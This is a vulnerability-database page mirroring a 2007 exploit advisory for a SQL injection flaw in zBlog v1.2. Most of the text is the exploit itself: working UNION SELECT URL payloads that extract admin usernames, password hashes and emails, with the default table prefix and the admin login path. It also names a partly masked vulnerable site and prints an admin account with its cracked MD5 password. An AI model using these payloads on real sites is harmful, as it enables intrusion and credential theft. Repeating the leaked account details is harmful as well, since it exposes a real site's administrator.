Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

zblog-sql.txt

🗓️ 24 Dec 2007 00:00:00Reported by H-T TeamType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

zBlog v1.2 Remote SQL Injection Exploit. Vulnerable to remote SQL injection attacks allowing access to admin credentials and passwords

Show more
Code
`#########################################################################  
zBlog v1.2 Remote SQL Injection Exploit  
#########################################################################  
  
  
## AUTHOR : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN )  
## HOME : http://no-hack.net  
  
## Script : zBlog  
## Version : 1.2   
## Site : http://kaxz01.free.fr/  
## Download : http://kaxz01.free.fr/fichiers/zBlog.zip  
  
## EXPLOITS :  
  
[1]  
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--  
[2]  
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--  
  
[table prefix] = by default it is zblog  
  
ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--  
  
## Note  
admin login is at /admin/  
  
## GREETZ : RoMaNcYxHaCkEr , Mahmood_Ali , C_m and all musulmans hackers  
  
#########################################################################  
zBlog v1.2 Remote SQL Injection Exploit  
#########################################################################  
  
exemple of site vulnerable  
  
http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--  
  
  
account admin with password md5 cracked  
  
user >> Selim  
pass >> 6a81060b83b919bc115112bf840eca63 = miles  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
zblog v1.2remote sql injectionadmin credentialspasswordsvulnerable
19
.json
Report